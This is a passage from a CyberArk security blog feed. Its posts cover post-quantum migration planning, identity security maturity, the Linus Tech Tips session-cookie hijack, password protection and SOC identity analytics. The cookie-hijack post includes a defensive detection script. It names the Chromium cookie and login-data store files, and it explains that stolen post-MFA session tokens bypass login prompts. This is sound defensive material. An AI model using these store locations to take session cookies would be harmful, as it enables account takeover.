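def system_exposure(system: System) -> str:
    """Step 3 (map connections): a system is only as strong as its weakest primitive."""
    labels = (classify_algorithm(a) for a in system.algorithms)
    return max(labels, key=SEVERITY.__getitem__, default="unknown")


def priority_score(system: System) -> int:
    """Step 2 (inventory data): weigh exposure by sensitivity and shelf life,
    so a long-lived secret behind broken crypto outranks a short-lived one."""
    horizon = min(system.shelf_life_years, HORIZON_YEARS)
    return SEVERITY[system_exposure(system)] * system.sensitivity * (1 + horizon)


def recommend(system: System) -> str:
    exposure = system_exposure(system)
    if exposure == "broken" and system.shelf_life_years >= HORIZON_YEARS:
        return "migrate now: data outlives the expected arrival of a quantum computer"
    if exposure == "broken":
        return "schedule migration to a NIST post-quantum algorithm"
    if exposure == "unknown":
        return "complete the inventory: unrecognised algorithm in use"
    if exposure == "weakened":
        return "raise symmetric key size (e.g. AES-128 to AES-256)"
    return "no action needed"


def build_plan(systems: List[System]) -> List[Tuple[str, str, int, str]]:
    """Step 4 (make a plan): ordered migration plan, highest priority first."""
    ranked = sorted(systems, key=priority_score, reverse=True)
    return [(s.name, system_exposure(s), priority_score(s), recommend(s)) for s in ranked]


# Constructed inventory for demonstration; not real systems.
INVENTORY = [
    System("hr-records-db", ["RSA-2048", "AES-256"], 5, 30),
    System("public-website", ["ECDH-P256", "ECDSA-P256", "AES-128"], 1, 0),
    System("backup-archive", ["AES-128"], 4, 15),
    System("build-signing", ["CRYSTALS-Dilithium", "SHA-256"], 3, 5),
    System("legacy-vpn", ["LEGACY-PROPRIETARY", "AES-256"], 3, 3),
]

if __name__ == "__main__":
    for name, exposure, score, action in build_plan(INVENTORY):
        print(f"{score:4d}  {name:15s} {exposure:9s} {action}")
```

Note how the public website, although its key exchange is broken by Shor, ranks below the AES-128 backup archive: its sessions carry nothing worth decrypting in ten years, while the archive does.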

If your organization has the cryptographic expertise, it can get involved with NIST or other entities working to develop post-quantum cryptography standards and raise awareness. For example, my fellow cryptographers may be interested to know that NIST is currently accepting additional post-quantum cryptography digital signature scheme proposals until June 1, 2023.

Changing our cryptographic infrastructure won’t happen overnight but with enough lead time, collaboration and a pragmatic approach, we can move confidently and securely into the quantum computing era.


Dr. Erez Waisbard is a Technology and Research Lead at CyberArk

Editor’s note: To learn more about quantum computing’s impact on classic cryptography, read Dr. Waisbard’s Medium post, “Quantum Computing is Going to Kill Classic Cryptography. But We Can Still Save It” and tune in to our podcast conversation on this topic on the Trust Issues podcast.

]]>
How to Map Identity Security Maturity and Elevate Your Strategy https://www.cyberark.com/blog/how-to-map-identity-security-maturity-and-elevate-your-strategy/ Tue, 28 Mar 2023 12:54:54 +0000 https://www.cyberark.com/?p=141360 Identity Security Maturity

The ultimate goal of Identity Security is to provide secure access to every identity for any resource or environment, from any location, using any device. Yet ever-evolving technology and dynamic threats can make executing a comprehensive Identity Security program a complex undertaking. According to the new Enterprise Strategy Group (ESG) research report “The Holistic Identity Security Maturity Model,” most organizations (42%) are still in the early days of their Identity Security journeys. Understanding your business’s current Identity Security maturity in relation to its ideal state is vital because, in the words of Henry Kissinger, “If you do not know where you are going, every road will get you nowhere.”

So, where do you start? What assessment factors matter most? How do you stack up against industry peers and track improvement over time? To help eliminate some of this guesswork, ESG created a data-driven Identity Security Maturity Model that measures maturity levels across four distinct tenets. This model draws on insights from 1,500 global cybersecurity professionals responsible for securing identities in multi-cloud IT environments.

Prescriptive guidance is also found in the CyberArk Blueprint for Identity Security Success, a vendor-agnostic framework for developing a successful Identity Security program. The Blueprint is based on decades of experience and lessons learned from helping more than 8,000 global organizations secure their identities and protect what matters most.

Two Critical Identity Security Program Assessment Factors

As your organization thinks about building its Identity Security program, there are two fundamental factors to consider in tandem: Capability breadth and deployment depth.

The Identity Security Maturity Model describes the breadth of capabilities across tools, integrations, automation and continuous threat detection and response (CTD&R). These are capabilities and integrations your organization should strive to deliver to mitigate Identity Security risk. That guidance is supplemented by the CyberArk Blueprint, which not only considers capability breadth but also deployment depth by aligning capabilities to specific resources and environments requiring Identity Security controls.

identity security breadth and depth matrix

Figure 1: Identity Security Breadth and Depth Matrix

While you may understand your organization’s capability breadth, it does not explicitly correlate to the depth in which those capabilities have been implemented across your environment. For this reason, it’s essential to consider the Identity Security Maturity Model and the CyberArk Blueprint together as you chart your course.

This is illustrated in the above diagram. While the Transformative organization may be more capable than the Novice, that doesn’t necessarily mean it has implemented the right capabilities across the right identities and resources or mitigated the most prevalent Identity Security threats by risk priority.

Maximizing Your Capabilities: Guidance for Novice Organizations

If you’ve assessed your organization as “Novice,” you’re not alone: 42% of global organizations operate at this capability maturity level today.

We’ve aligned ESG’s model with our proven CyberArk Blueprint framework to help you measure the breadth and depth of your Identity Security program and determine pragmatic steps to uplevel your strategy. Your dual aim should be advancing your position in the Identity Security Maturity Model while addressing security deficiencies in risk-based phases to go deeper with the CyberArk Blueprint.

Below, we’ll demonstrate how a Maturity Level 1: Novice organization can use these combined insights to maximize Identity Security capabilities and outcomes.

Snapshot of a Novice Organization

While 38% of Novice organizations believe they’ve made correct identity-related decisions, most organizations at this level have yet to invest in foundational Identity Security tools and lag in integrating and automating tools they do have in their environments. Existing controls tend to focus heavily on human identities, leaving third-party and non-human identities unmanaged. Generally, these organizations lack the confidence to mitigate identity-related risks promptly and are slow to respond to audit requests.

There is a clear gap between investment and outcomes at this level: 32% of Novice organizations have suffered two or more successful identity-related cyberattacks compared to just seven percent of the most mature organizations – those categorized as Transformative. Many of these attacks stem from credential compromise and malware. Novice organizations point to fragmentation, insufficient staffing and budget constraints as major roadblocks yet continue to forge ahead with cloud adoption that can significantly expand the attack surface.

Novice Blueprint Focus: Secure High-Value Targets for Rapid Risk Mitigation

Without proper Identity Security controls in place, malicious actors can easily steal credentials to exploit identities, move laterally and vertically throughout the environment, and ultimately escalate and abuse privileges to achieve their goals. This attack chain is at the center of all identity attacks.

Fortunately, Novice organizations can quickly address their greatest liabilities by focusing on highly privileged identities, which attackers often exploit to take control of an environment. These identities may have entitlements such as cloud admin, domain admin, hypervisor admin or Windows server admin. The personas who consume these privileges are often cloud operators, site reliability engineers and IT administrators, a relatively small scope of identities that pack a massive punch.

By taking the Blueprint’s risk-based approach to prioritization, Novice organizations can measurably drive down risk while making the most of existing capabilities, controls and integrations. The same logic applies to organizations at every maturity level. As you expand your toolset and mature your capabilities, a risk-based approach keeps you focused on the right identities and personas at each stage of the journey.

Building Your Identity Security Plan

To get started, develop a strategy for maximizing the impact and value of current controls – this is especially important for organizations in the early stages of maturity.

This should culminate in a program roadmap that sets the direction for the Identity Security initiative and leads to advanced levels of maturity. Therefore, aligning Maturity Level 1: Novice with Stage 1 of the CyberArk Blueprint becomes an important fundamental strategy when building a plan that seeks to maximize risk reduction and impact.

However, it’s important to remember these are two distinct models, and explicit one-to-one mapping of maturity levels and Blueprint stages shouldn’t be the goal. Additionally, every organization is unique. To take full advantage of this foundational guidance, you must understand your organization’s current risk state and capabilities. You’ll also need to take stock of internal priorities. For instance, are you facing new audit and compliance requirements, advancing a Zero Trust initiative or reacting to an internal security incident or breach? While these are all valid reasons for prioritizing security efforts, they alone should not define your plan. Initiatives driven by internal priorities must also consider the level of risk, impact of mitigation and level of effort, as well as relevant industry guidance to help drive informed decision-making.

Finally, your organization’s desired business outcomes (the goals, objectives and specific results you seek to achieve through the Identity Security program) must also be factored into roadmap design. You can learn more about incorporating multiple organization-specific factors into a roadmap in our Success blog post, “Create Your Identity Security Roadmap with the CyberArk Blueprint.”

identity security roadmap example

Figure 2: Identity Security Roadmap Example

By marrying all these together, you can create a winning Identity Security roadmap that’s tailored to your organizational needs and risks, but still reflective of industry and security best practices.

As mentioned, since every organization is unique, there is no one-size-fits-all way to approach Identity Security. However, we hope this information provides some useful prioritization guidance and clarity as you mature your strategy. You can also explore ways to use the CyberArk Blueprint to help achieve specific goals, from understanding the identity attack surface and assessing your security posture to learning best practices and building your roadmap.

Source: ESG White Paper, The Holistic Identity Security Maturity Model, February 2023.

]]>
LTT Attack Targets Session Cookies to Push Crypto Scam https://www.cyberark.com/blog/ltt-attack-targets-session-cookies-to-push-crypto-scam/ Mon, 27 Mar 2023 08:12:45 +0000 https://www.cyberark.com/?p=141767 Cookies with bitcoin symbol

Crypto scams are skyrocketing: In 2022, the FBI tracked a 183% year-over-year increase, driving $2.57 billion in losses. Last week, the popular YouTube channel Linus Tech Tips (LTT for short) – and two associated channels – became the latest crypto scam victim and unsuspecting accomplice. In this video, host Linus Sebastian gives a first-hand account of what went down – highlighting the dangers of cookie hijacking and the need for stronger endpoint privilege security protections across the board.

Recapping the LTT YouTube Account Takeover

Based on news reports and Sebastian’s explanation of the LTT attack, here’s a quick recap:

  • An LTT content editor opened a PDF email attachment that appeared to be work-related.
  • Within 30 seconds, the attachment – actually malware – dumped all the information from both the Chrome and Edge browsers on the machine, including web session tokens. Stored in cookies, these tokens authenticate a device or browser and let users stay logged in to websites.
  • By hijacking these cookies, the attacker was able to do everything from bypassing password and multi-factor authentication login prompts to mass-deleting existing videos, changing channel names and live streaming a crypto scam video.
  • After numerous attempts to shut down the scam videos, LTT finally restored control of the channel with YouTube’s help.

Cookie Hijacking: It Gets the Job Done

Cookie hijacking isn’t a new or sophisticated attack technique for gaining access to a corporate environment, but it gets the job done. Especially now that web-based applications are ubiquitous, attackers and credential-stealing malware often go after browsers (which seemingly know everything about us). They recognize that there’s no need to attack domain controllers anymore when targeting browsers – treasure troves of stored credential data (URL/username/password combinations) and session cookies – is just as effective and takes far less effort.

Most cyberattacks require some privileged access but not cookie hijacking. CyberArk Labs researchers demonstrated in 2022 that session cookies could be extracted effectively by a standard process running on the endpoint machine. In other words, any program or script that’s executed by a standard business user (or an attacker pretending to be one) can access the security tokens and credentials stored in the browser. This is critical as the session tokens stored by browsers in cookies are post-MFA and long-lived, meaning one can use them to bypass MFA mechanisms and access cloud services and on-premises applications.
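A defender can watch for exactly the behavior described above: a process other than the browser itself opening the browser’s cookie and login stores, and one process draining both Chrome and Edge in quick succession. The detection logic below is an added example, not CyberArk’s product code; the event format, the store file names and profile paths, and the sample events are all constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Chromium-based browsers keep session cookies and saved logins as SQLite
# files under the profile directory. Assumption: these file names and
# profile paths match the installs being monitored.
SENSITIVE_STORES = {"Cookies", "Login Data", "Web Data", "Local State"}
BROWSER_PROFILE_DIRS = {
    "chrome": r"\Google\Chrome\User Data",
    "edge": r"\Microsoft\Edge\User Data",
}
# Only the browsers themselves are expected to open their own stores.
ALLOWED_IMAGES = {"chrome.exe", "msedge.exe"}

# Constructed telemetry format: one file-access event per line.
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) pid=(?P<pid>\d+) '
    r'image="(?P<image>[^"]+)" op=(?P<op>\w+) path="(?P<path>[^"]+)"$'
)


@dataclass
class Alert:
    ts: str
    user: str
    pid: str
    image: str
    browser: str
    path: str


def browser_for_path(path: str) -> Optional[str]:
    """Return which browser's credential store a path belongs to, if any."""
    if path.rsplit("\\", 1)[-1] not in SENSITIVE_STORES:
        return None
    for browser, profile_dir in BROWSER_PROFILE_DIRS.items():
        if profile_dir in path:
            return browser
    return None


def check_event(line: str) -> Optional[Alert]:
    """Alert when a process other than the browser reads a cookie or login store."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    browser = browser_for_path(m["path"])
    if browser is None:
        return None
    image_name = m["image"].rsplit("\\", 1)[-1].lower()
    if image_name in ALLOWED_IMAGES:
        return None
    return Alert(m["ts"], m["user"], m["pid"], m["image"], browser, m["path"])


def scan(lines: List[str]) -> List[Alert]:
    return [alert for alert in map(check_event, lines) if alert is not None]


def multi_browser_dumps(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Escalate a single process that touches more than one browser's stores,
    the pattern the LTT editor's machine showed within 30 seconds."""
    touched: Dict[str, set] = {}
    for alert in alerts:
        touched.setdefault(alert.pid, set()).add(alert.browser)
    return {pid: sorted(b) for pid, b in touched.items() if len(b) > 1}


# Constructed sample events: a normal browser read, an attachment-launched
# executable draining both Chrome and Edge stores, and an unrelated read.
SAMPLE_LOG = r"""
2023-03-23T10:14:02Z user=studio\editor pid=4120 image="C:\Program Files\Google\Chrome\Application\chrome.exe" op=read path="C:\Users\editor\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"
2023-03-23T10:15:40Z user=studio\editor pid=6612 image="C:\Users\editor\AppData\Local\Temp\brief.pdf.exe" op=read path="C:\Users\editor\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"
2023-03-23T10:15:41Z user=studio\editor pid=6612 image="C:\Users\editor\AppData\Local\Temp\brief.pdf.exe" op=read path="C:\Users\editor\AppData\Local\Google\Chrome\User Data\Default\Login Data"
2023-03-23T10:15:43Z user=studio\editor pid=6612 image="C:\Users\editor\AppData\Local\Temp\brief.pdf.exe" op=read path="C:\Users\editor\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"
2023-03-23T10:16:10Z user=studio\editor pid=7004 image="C:\Windows\System32\notepad.exe" op=read path="C:\Users\editor\Documents\notes.txt"
""".strip()

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for a in found:
        print(f"{a.ts} {a.user} pid={a.pid} {a.image} read {a.browser} store {a.path}")
    for pid, browsers in multi_browser_dumps(found).items():
        print(f"pid {pid} dumped stores from {', '.join(browsers)}: likely credential theft")
```

Because the reads happen under the standard user’s own token, this is a behavioral signal rather than a privilege signal; an endpoint privilege control that blocks unknown executables from opening these stores removes the need to detect after the fact.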

Efforts to address this are detailed in CyberArk Labs’ GO BLUE! manifesto, which further underscores the challenges organizations face in defending against attackers who manage to log into devices as legitimate users.

Phishing, Human Error and the Endpoint Privilege Security Safety Net

As so many do, the LTT attack began with spear phishing. Many point to cybersecurity training as the answer. While this can help reduce the number of successful phishing attacks and speed up response times, even the best cybersecurity education can’t change the fact that people make mistakes. When they do, technology should be there to step in, bridging that gap and minimizing the impact of human error.

In the case of LTT, a piece of malware was downloaded from the internet and executed on an endpoint machine. Instead of pointing fingers and placing blame, proper endpoint privilege security controls work in concert to identify malware and block it from running in the first place.

With the right endpoint privilege management approach, a mistake will remain a mistake. Not an “end of all,” or a “We are writing to notify you of a cyber incident” event. Just a mistake.


This is not the first nor will it be the last time we see a major social media account takeover. But this LTT attack stands out for its leader’s unusual response: Sebastian lifted a veil for the community by demonstrating how quickly things can spiral and why a technology safety net is required to protect from attacks like cookie hijacking. This attack trend continues to grow in popularity and demands our attention.

To see a cookie hijacking attack through the eyes of an attacker and explore mitigation best practices, check out this on-demand webinar hosted by CyberArk Labs and the Red Team.

Protect Passwords, Don’t Just Manage Them: A Game Plan for CIOs and CISOs
https://www.cyberark.com/blog/protect-passwords-dont-just-manage-them-a-game-plan-for-cios-and-cisos/
Fri, 17 Mar 2023 18:37:32 +0000

When 921 password attacks occur per second, it’s time to treat everyday employees’ credentials like the true operational risk they are.

Today’s attackers assign a level of value to employees’ passwords they once reserved for privileged users’ credentials. Why? Workers now have a shocking amount of access to sensitive resources. I’ll elaborate… but through the perspective of a chief information officer kept up at night by risks.

Here’s an example of what crosses a CIO’s mind at 2:30 a.m.

Fifty-two percent of employees have access to sensitive corporate data, according to a CyberArk survey of 1,750 security decision-makers from ten industries. In some sectors, that percentage is even higher:

  • Six out of 10 (62%) employees in the media, leisure and entertainment industry, where the data may include millions of subscribers’ personal information
  • Nearly two-thirds (65%) of employees in the healthcare sector, where the data may — again — include subscriber information, but this time for health insurance policies or patient records

What could happen if a single app is compromised in either industry? Lost trust, which can equal lost subscribers, revenue, market share and credibility among regulators.


As I calculate all of this (while I should be sleeping), what alarms me the most is what’s standing in between these sensitive resources and attackers who constantly target them:

  1. Passwords, which are a key contributor to the 82% of attacks stemming from “the human element,” which includes the many unsafe ways employees create, store and share credentials.
  2. Tools for managing passwords that are designed for personal use, but often end up being used by entire enterprises — even though they typically lack basic security controls.

If attackers are treating employees’ credentials like they’re privileged, then so should we … right down to the specific ways enterprises secure how passwords are stored, shared, created and managed. In this post, I’d like to share my thoughts on strategic steps you can take to mitigate your organization’s password risks.


Understand Your Password Vulnerabilities with a Risk Assessment

My 25 years of experience in the Israel Defense Forces taught me how important a strategic risk assessment can be, including:

  • The risks you face.
  • The probability and likelihood of attacks.
  • The gaps that make your organization vulnerable.

Why start with such an essential assessment? I recall a major cyber exercise from years ago — this approach helped me make a calculated decision that would affect the organization’s operational continuity.

Focusing on passwords, let’s start with what we know.

Many widely used applications are incompatible with — and therefore not protected by — your single sign-on (SSO) tool. They also don’t use modern identity protocols. This includes popular apps for virtual collaboration, banking and shipping.

We also know that employees often access these unprotected apps through one of two methods:

  1. Passwords created with little attention to complexity or uniqueness, often stored in places like Excel docs saved on endpoints — and often shared via unsecured methods like email.
  2. Passwords stored in — and retrieved from — the consumer-grade tools I mentioned earlier, which might allow a simple UX, but typically cannot:
    – Provide control and visibility into who has access to what apps.
    – Offer detailed logging and reporting functionality, which limits auditing capabilities.
    – Prevent employees from saving passwords in their browsers, a key entryway for attackers targeting endpoints.

Now, let’s ask questions whose answers you may not know yet – but will ultimately give you data that informs strategic decisions.

  • In your organization, which apps live outside of SSO and how many are there? What kinds of data do these apps contain? Which apps are approved by IT and which bypassed your policies?
  • Who in your workforce is using these apps: small, concentrated segments of employees, entire business units or the full organization?
  • For each of these high-risk apps, what controls and tools — if any — do you have in place for not merely managing them, but protecting them?

With a data-informed assessment of your enterprise’s password vulnerabilities, you can decide on which controls to put in place to mitigate risks to your organization.

Action Steps: Four Ways to Protect Passwords Like They’re Privileged Credentials

Here are four ways you can apply security-first controls to employee passwords while balancing the need for protection and productivity.

1. Security-first Password Storage and Retrieval

IT and security teams can mitigate the risks of highly vulnerable passwords by implementing secure, centralized storage for workforce credentials. Key functions to look for:

  • The ability to centrally control how accounts and credentials are stored, managed and retrieved
  • The peace of mind of securing passwords with end-to-end encryption in transit or at rest
  • The flexibility to host passwords in a secure cloud location or self-hosted vault, depending on your organization’s needs

Organizations can protect employee credentials by enabling automated, real-time password retrieval from their chosen cloud or vault location. Inspired by just-in-time controls typically used for the IT admins of the world, this capability can help CIOs, CISOs and their teams ensure passwords are never stored locally at endpoints — thus reducing the attack surface.

2. Safe Password Sharing and Account Management

Considering the threats we’ve discussed, you’re likely seeking greater control over how employees share passwords. By applying a least privilege approach, enterprises can ensure that employees — for example, line-of-business team managers — can securely share credentials without revealing password characters. Here are key controls to adopt:

  • Protect privacy by controlling who can share, view and edit credentials.
  • Impose precise time limits on how long a user can access a shared app.
  • Manage the transfer of credential ownership to new users.
  • Prevent users from saving passwords in built-in browser password managers, reducing the number of accounts and credential repositories.

In an era of increased workforce turnover, this level of control is essential. For example, with automated tools, you could transfer ownership of an app’s account without losing the chain of custody when the primary owner leaves your organization.


3. Frictionless — and Secure — User Experience

Eighty-six percent of security leaders believe that optimizing the user experience is important-to-very important for enabling Zero Trust success through Identity and Access Management tools. Building upon that perspective, enterprises can benefit from the password protection capabilities that can:

  • Integrate with corporate directories and third-party identity providers.
  • Know when users are entering credentials into web apps’ login forms and offer to save them in a secure vault — and securely auto-fill credential fields in future instances.
  • Automatically generate strong, complex and unique passwords for users whenever needed.

4. End-to-end Visibility for Audits and Reporting

An enterprise-grade approach to password protection should provide real-time visibility into users’ access activity. For example, security admins need the ability to determine which employees have accessed a specific application during a particular time — with intuitive reporting for audits.

But what happens to visibility after a user logs in? Security controls must continue past the point of authentication. Enterprises should look for ways to require an extra layer of protection that allows them to monitor and record all actions taking place once a user is logged in.

In light of today’s compliance demands, it’s important to ensure any records surrounding high-risk actions taken in apps are backed up by a full audit trail.

Putting it All Together: Identity Security

Eighty-two percent of security decision-makers have an assume-breach mindset. If you’re among them, you know: no organization is immune to a breach or attack. So as part of your strategic planning, it’s essential to have operations in place to deal with threats as they materialize.

By using the four best practices in this piece, you can meet the urgent need of securing employee credentials and enforcing an enterprise-wide password policy. And while passwords are a reality for organizations today, you can build toward a passwordless future, as our industry continues to innovate.

In the meantime, it’s important to keep the long game in mind.

Securing the enterprise is an ongoing mission. As you bolster your password protection capabilities, you can build toward a holistic Identity Security approach that brings together a range of controls and solutions. Considering what we’ve learned from recent breaches, here are a few examples of how an Identity Security mindset can help you:

  • If you have enterprise-grade password protection, you can complement it with adaptive multifactor authentication (MFA) that can increase the difficulty of challenges when it identifies signs of risk.

  • If you believe parts of your workforce — for example, employees with access to cloud controls — should pass MFA no matter what (keeping in mind MFA fatigue), you can require phishing-proof MFA factors such as number-matching authentication.
  • If you’re concerned about attackers stealing credentials at the endpoint, you can establish controls to ensure users can only access critical environments from trusted machines.
  • If you’re working on putting the right solutions in place, remember: having the right people in place is also key. From CIOs and CISOs to admins and DevOps teams, everyone has a role to play.

Together, these are key examples of Identity Security in action. We at CyberArk advocate this approach to our customers and partners and we use it ourselves. I believe this is the way to protect passwords, enable Zero Trust and hopefully… reduce the number of concerns keeping you up at night.

You can learn more about our solution for applying enterprise-grade protection to your employees’ passwords: CyberArk Workforce Password Management.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

How to Streamline Security Operations With Identity Security Intelligence
https://www.cyberark.com/blog/how-to-streamline-security-operations-with-identity-security-intelligence/
Thu, 09 Mar 2023 21:59:02 +0000

“Black Swan” author Nassim Nicholas Taleb once wrote that “intelligence consists in ignoring things that are irrelevant (avoiding false patterns).” Organizations must take this definition to heart as they incorporate Identity Security intelligence – an essential element of any Zero Trust cybersecurity strategy.

Many organizations have dedicated Security Operations Center (SOC) teams responsible for their threat detection, investigation and response efforts. To the layperson, SOC teams often seem like the all-seeing eye of an organization, immediately detecting any bad behavior across infrastructure, applications and endpoints. In reality, though, monitoring for threats, remediating vulnerabilities and executing incident response plans are a ton of work. SOC teams must work across the security organization to collect and analyze the right data and ignore false positives (a.k.a. irrelevant things). In the case of Identity Security, this means analyzing user behavior analytics that enable rapid responses to anomalous or risky privileged access to infrastructure and applications.

The 2022 CyberArk Identity Security Threat Landscape Report reveals that credential access is the most reported risk of all tactics in the MITRE ATT&CK framework. This isn’t exactly shocking. Most cyberattacks take the path of least resistance: compromise an identity by stealing credentials, move laterally and escalate privileges.

Yet despite this understanding, many organizations struggle to apply enhanced threat detection to their most significant source of cybersecurity risk: compromised identities and credentials. To embody Zero Trust and an assume-breach mindset, organizations must improve their ability to respond rapidly to identity-centric attacks.

Why It’s So Difficult to Detect and Remediate Identity-related Threats

To better understand the challenges of detecting and mitigating identity compromise attacks, let’s dive a bit deeper. Organizations face several challenges with identity threat detection and protection, such as:

1. A wide variety of attack methods. The bad guys have lots of effective methods to compromise identities. From phishing, social engineering and credential harvesting to ransomware attacks that aim to compromise local admin accounts on endpoints, attackers have a big arsenal of tactics used to steal credentials and passwords.

It may take time to realize passwords have been stolen. And insider threats pose another significant complication. When employees break bad, they can use their existing, valid credentials. To defend against internal bad actors, organizations need holistic data and context to identify anomalous or high-risk behavior.

2. Internal access control friction. It’s not always easy for Identity Security and SOC teams to get along. Identity Security programs manage access control policies, provisioning entitlements while adhering to audit and compliance requirements like the rule of least privilege. These teams also own authentication and authorization policies that may be designed to address usability requirements from their developer, admin and workforce stakeholders. This can cause more permissive access control policies than the SOC team might design to prioritize risk reduction.

At the same time, SOC teams may need to use administrative accounts outside of their regular responsibilities when remediating security incidents. Without clearly documented incident response plans and policies granting access for automatic remediation, SOC teams can face slower response times.

3. Siloed technologies and processes. Remember the point about ignoring false patterns? It’s important that threat analytics capabilities in privileged access management (PAM) or Identity as a Service (IDaaS) solutions integrate with the tools SOC teams already rely on. Key examples include security information event management (SIEM) and extended detection and response (XDR) solutions. Without the full data that these integrations provide, SOC teams may not be able to see the full picture and could identify false positives.

Even worse, without proper data correlation to generate alerts, Identity Security solutions might not allow SOC teams to see the signal in the noise. Without full context, SOC teams might miss valid patterns that could indicate compromise. For example, an organization with siloed IDaaS and PAM analytics may be able to detect individual low-risk actions like an administrator entering a low-risk command in a privileged session or accessing a web app from an irregular location. In combination, these “low-risk” events may be a strong case for a closer look. But with siloed analytics, SOC and Identity Security teams may not spot the valid pattern.

Threat detection capabilities are only as effective as the data they can analyze. If Identity Security and SOC technologies are not integrated for multi-directional data sharing, SOC teams may face a high number of false positives or worse – a low number of threats detected.

How Can Identity Security Intelligence Streamline Security Ops?

Security is a team game. As with any other security challenge, solving this gap in identity threat detection and prevention requires a combination of people, processes and technology. Here are some recommendations:

1. Document and automate processes for responding to identity-centric attacks. Documented plans in incident response scenarios provide a standardized playbook to help ensure alignment and accountability between SOC and Identity Security teams. And in many cases, documented incident response plans can also help satisfy cyber insurance, audit and compliance requirements.

As a best practice, building clear plans for responding to different types of security incidents (e.g., dedicated actions for remediating a phishing attack) can also streamline response processes, helping minimize the business disruption of security incidents.

2. Centralize threat detection across all user access. Multi-contextual analysis of user access can provide SOC and Identity Security teams with a complete picture of a potential security incident. This data correlation can help accelerate detection and response.

For example, Identity Security Intelligence, a shared service of the CyberArk Identity Security Platform, analyzes a user’s access to web applications and privileged accounts to detect and remediate in-progress attacks. Identity Security Intelligence centrally gathers user behavior analytics data such as login date and time, login location and actions performed by privileged accounts. The service then detects and sends alerts regarding behavior that departs from a user’s behavioral baseline access patterns to web apps and IT infrastructure.

Multi-contextual user behavior analytics in Identity Security Intelligence (screenshot of the CyberArk Identity Security Platform)

Armed with sharper, multi-contextual insight, SOC and Identity Security teams can identify and respond to combinations of behavior that may signal identity compromise, such as an irregular login time, and then entry of specific commands in a remote session to a corporate server.
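The correlation argued for in the two passages above (individually low-risk IDaaS and PAM events that together merit a closer look), as an added example that is not CyberArk’s code or the product’s logic. The event fields, risk weights and 30-minute window are constructed assumptions, not a real schema.

```python
"""
Added example (not CyberArk's code): correlate two siloed identity signals,
web-app (IDaaS) logins and privileged (PAM) session commands, so that events
that are each below the alert threshold become one alert when they co-occur
for the same user within a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events. In a real deployment these would come from the
# IDaaS and PAM solutions; the field names here are assumptions.
IDAAS_EVENTS = [
    {"user": "alice", "ts": "2023-03-09T02:10:00", "type": "web_login",
     "app": "hr-portal", "country": "NL", "usual_country": "US"},
    {"user": "bob", "ts": "2023-03-09T09:05:00", "type": "web_login",
     "app": "crm", "country": "US", "usual_country": "US"},
    {"user": "carol", "ts": "2023-03-09T03:40:00", "type": "web_login",
     "app": "wiki", "country": "BR", "usual_country": "US"},
]
PAM_EVENTS = [
    {"user": "alice", "ts": "2023-03-09T02:25:00", "type": "session_cmd",
     "target": "srv-db-01", "cmd": "cat /etc/hosts"},
    {"user": "bob", "ts": "2023-03-09T09:30:00", "type": "session_cmd",
     "target": "srv-web-02", "cmd": "cat /etc/hosts"},
    {"user": "carol", "ts": "2023-03-09T15:00:00", "type": "session_cmd",
     "target": "srv-db-01", "cmd": "ls /var/log"},
]

# Assumed weights: each signal alone stays below the threshold.
ALERT_THRESHOLD = 50
CORRELATION_WINDOW = timedelta(minutes=30)


def score_idaas(ev: Dict) -> int:
    """Low-risk signal: a web login from a country other than the user's usual one."""
    return 30 if ev["country"] != ev["usual_country"] else 0


def score_pam(ev: Dict) -> int:
    """Low-risk signal: a read-only command that inspects system configuration."""
    return 30 if ev["cmd"].startswith("cat /etc/") else 0


def siloed_alerts(idaas: List[Dict], pam: List[Dict]) -> List[str]:
    """Users each tool would flag on its own; empty here, since no single
    score reaches ALERT_THRESHOLD."""
    flagged = [ev["user"] for ev in idaas if score_idaas(ev) >= ALERT_THRESHOLD]
    flagged += [ev["user"] for ev in pam if score_pam(ev) >= ALERT_THRESHOLD]
    return flagged


def correlated_alerts(idaas: List[Dict], pam: List[Dict]) -> List[Dict]:
    """Add the scores of an IDaaS login and a PAM command for the same user
    when the command follows the login within CORRELATION_WINDOW, and return
    the combinations that cross ALERT_THRESHOLD."""
    logins = defaultdict(list)
    for ev in idaas:
        logins[ev["user"]].append(ev)
    alerts = []
    for cmd_ev in pam:
        cmd_ts = datetime.fromisoformat(cmd_ev["ts"])
        for login_ev in logins[cmd_ev["user"]]:
            login_ts = datetime.fromisoformat(login_ev["ts"])
            delta = cmd_ts - login_ts
            if timedelta(0) <= delta <= CORRELATION_WINDOW:
                total = score_idaas(login_ev) + score_pam(cmd_ev)
                if total >= ALERT_THRESHOLD:
                    alerts.append({
                        "user": cmd_ev["user"],
                        "score": total,
                        "login_from": login_ev["country"],
                        "target": cmd_ev["target"],
                        "cmd": cmd_ev["cmd"],
                        # What an integration with PAM could act on (see the
                        # post's suspend/terminate-session example).
                        "recommended_action": "suspend privileged session and review",
                    })
    return alerts


if __name__ == "__main__":
    print("siloed:", siloed_alerts(IDAAS_EVENTS, PAM_EVENTS))
    for alert in correlated_alerts(IDAAS_EVENTS, PAM_EVENTS):
        print("correlated:", alert)
```

With the constructed events, the siloed view raises nothing, while the correlated view flags only alice: an unusual-country login followed 15 minutes later by a configuration-reading command on a database server.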

3. Integrate Identity Security and SOC Team tools. Identity Security teams must arm their SOC teams with the data their solutions naturally detect. Data and alerts from threat analytics services like Identity Security Intelligence can accelerate the SOC team’s ability to detect stolen credentials, insider threats and other identity-centric attacks.

Similarly, SOC teams must configure integrations between their tools and Identity Security solutions to remediate threats. For example, if a SOC team identifies potential abuse of a privileged account used to maintain Windows servers, integration with a PAM solution can automatically suspend or terminate the session. Or in another scenario, if Identity Security Intelligence sends an alert on a risky command entered on a Linux server, security teams can use CyberArk’s identity orchestration capabilities to automatically prevent the employee from using privileged accounts through PAM.

Putting It All Together: The Need for Identity Security Intelligence

